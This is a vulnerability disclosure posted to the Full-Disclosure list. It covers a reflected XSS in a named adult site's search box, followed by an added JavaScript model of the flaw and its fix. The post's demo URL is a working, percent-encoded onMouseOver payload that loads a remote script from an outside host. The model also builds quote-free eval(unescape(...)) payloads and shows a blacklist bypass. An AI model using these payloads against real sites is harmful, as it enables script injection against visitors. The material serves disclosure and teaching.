Hello,

Yesterday I discovered a funny XSS injection in the website http://chicasdetorbe.com which is an affiliate site of the popular website http://www.putalocura.com/

Despite my efforts at contacting the site owner I received silence as an answer, I suppose because he thought this was either not serious or he just wanted to ignore me. Thus, after having sent various warnings of Full Disclosure, I have decided to publish the whole thing.

The vulnerability:

The vulnerability is quite simple: the contents of the search string are pasted, escaping characters like ' " and \, inside the value field of the input, thus you can insert whichever attributes you want, which allows for event-based injection as long as you don't use the characters ' " or \ since they will be escaped with an extra \. Take into account that even if they tried to detect dangerous strings this would be bypassable by adding <> since those are removed by the content manager.

The demo (the site is NSFW so be careful):

1. Go to: http://chicasdetorbe.com/?q=%22+onMouseOver%3Deval%28unescape%28%2F%2573%253d%2564%256f%2563%2575%256d%2565%256e%2574%252e%2563%2572%2565%2561%2574%2565%2545%256c%2565%256d%2565%256e%2574%2528%2527%2573%2563%2572%2569%2570%2574%2527%2529%253b%2573%252e%2573%2572%2563%253d%2527%2568%2574%2574%2570%253a%252f%252f%256b%256c%256f%256e%2564%2569%256b%2565%252e%2565%2573%252f%2564%2565%256d%256f%2574%256f%2572%2562%2565%252e%256a%2573%2527%253b%2564%256f%2563%2575%256d%2565%256e%2574%252e%2567%2565%2574%2545%256c%2565%256d%2565%256e%2574%2573%2542%2579%2554%2561%2567%254e%2561%256d%2565%2528%2527%2568%2565%2561%2564%2527%2529%255b%2530%255d%252e%2561%2570%2570%2565%256e%2564%2543%2568%2569%256c%2564%2528%2573%2529%253b%2F.source%29%29%2F%2F (You may need to copy and paste the whole link).
2. Put the mouse over the search bar on the top left.
3. Enjoy! (The text is in Spanish and basically offers links to free porn and photos of chonis: a social group in Spain).

klondike
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
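The following is an added example for this archive page; it is not code from klondike's post, nor from chicasdetorbe.com. It models the reflection the post describes (backslash-escaping of ' " and \, removal of < and >, and the query landing inside value="...") with assumed, reconstructed functions, and shows three things the post states: why addslashes-style escaping does nothing in an HTML attribute context, how a handler body can be carried with no quotes at all via eval(unescape(/.../.source)), and how a keyword blacklist that runs before the <> stripping is bypassed. The payload carries a benign alert('xss') instead of the post's remote script loader, nothing is eval'd, and no request is made; it also goes beyond the post by placing the hardened attribute-encoded template beside the vulnerable one.

```javascript
// Added example; every function here is an assumed reconstruction of the
// behaviour described in the post, not the site's actual code.

// Assumed server-side sanitiser: strips < and >, then addslashes-style
// escaping of ' " and \ (what the post says the site does).
function sanitizeLikeSite(q) {
  return q.replace(/[<>]/g, "").replace(/['"\\]/g, (c) => "\\" + c);
}

// Assumed vulnerable template: the query lands inside value="...".
function renderSearchBox(q) {
  return '<input type="text" name="q" value="' + sanitizeLikeSite(q) + '">';
}

// Hardened counterpart (added here): HTML attribute encoding. &quot; cannot
// close the attribute, so the whole query stays inside value.
function htmlAttrEncode(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")
          .replace(/"/g, "&quot;").replace(/'/g, "&#39;");
}
function renderSearchBoxFixed(q) {
  return '<input type="text" name="q" value="' + htmlAttrEncode(q) + '">';
}

// Build a handler body containing no ' " or \ at all: the real script is
// percent-encoded inside a regex literal and recovered at run time with
// unescape(/.../.source), the same shape as the post's payload. The trailing
// // comments out whatever the template appends after the value (the quote).
function quoteFreeHandler(js) {
  const hex = [...js]
    .map((c) => "%" + c.charCodeAt(0).toString(16).padStart(2, "0"))
    .join("");
  return "eval(unescape(/" + hex + "/.source))//";
}

// Assumed naive keyword blacklist that runs BEFORE the < > stripping, to
// model the bypass the post mentions: onMouse<>Over passes the check and
// becomes onMouseOver once the brackets are removed. Returns null if blocked.
function blacklistThenStrip(q) {
  if (/on\w+\s*=/i.test(q)) return null;
  return q.replace(/[<>]/g, "");
}

// How a browser tokenises the attributes of one start tag (simplified, but
// faithful on the points that matter): a backslash has no meaning in HTML,
// a double quote always ends a double-quoted value, and an unquoted value
// runs up to the next whitespace character.
function parseAttributes(tag) {
  const attrs = {};
  const body = tag.slice(tag.search(/\s/), tag.lastIndexOf(">"));
  let i = 0;
  while (i < body.length) {
    while (i < body.length && /\s/.test(body[i])) i++;
    if (i >= body.length) break;
    let name = "";
    while (i < body.length && !/[\s=]/.test(body[i])) name += body[i++];
    while (i < body.length && /\s/.test(body[i])) i++;
    let value = "";
    if (body[i] === "=") {
      i++;
      while (i < body.length && /\s/.test(body[i])) i++;
      const quote = body[i];
      if (quote === '"' || quote === "'") {
        i++;
        while (i < body.length && body[i] !== quote) value += body[i++];
        i++; // consume the closing quote
      } else {
        while (i < body.length && !/\s/.test(body[i])) value += body[i++];
      }
    }
    attrs[name.toLowerCase()] = value;
  }
  return attrs;
}

// Recover the script a quote-free handler would run, without running it
// (unescape and decodeURIComponent agree on plain %XX ASCII sequences).
function decodeHandler(handler) {
  const m = /unescape\(\/([^\/]*)\/\.source\)/.exec(handler || "");
  return m ? decodeURIComponent(m[1]) : null;
}

// Constructed input: a benign alert('xss') carried in the post's payload shape.
function demo() {
  const q = '" onMouseOver=' + quoteFreeHandler("alert('xss')");
  const vulnerable = parseAttributes(renderSearchBox(q));
  const fixed = parseAttributes(renderSearchBoxFixed(q));
  return {
    vulnerableValue: vulnerable.value,                      // only "\"
    injectedHandler: decodeHandler(vulnerable.onmouseover), // alert('xss')
    fixedHasHandler: "onmouseover" in fixed,                // false
    blacklistBlocks: blacklistThenStrip('" onMouseOver=1') === null,
    blacklistBypassed: blacklistThenStrip('" onMouse<>Over=1'),
  };
}

console.log(demo());
```

The model makes the root cause explicit: the backslash that the site adds before the double quote is an ordinary character to the HTML tokenizer, so the attribute value becomes just "\" and everything after the quote is parsed as new attributes. Escaping has to match the output context (attribute encoding here), and any blacklist applied before a transformation such as <> removal checks the wrong string.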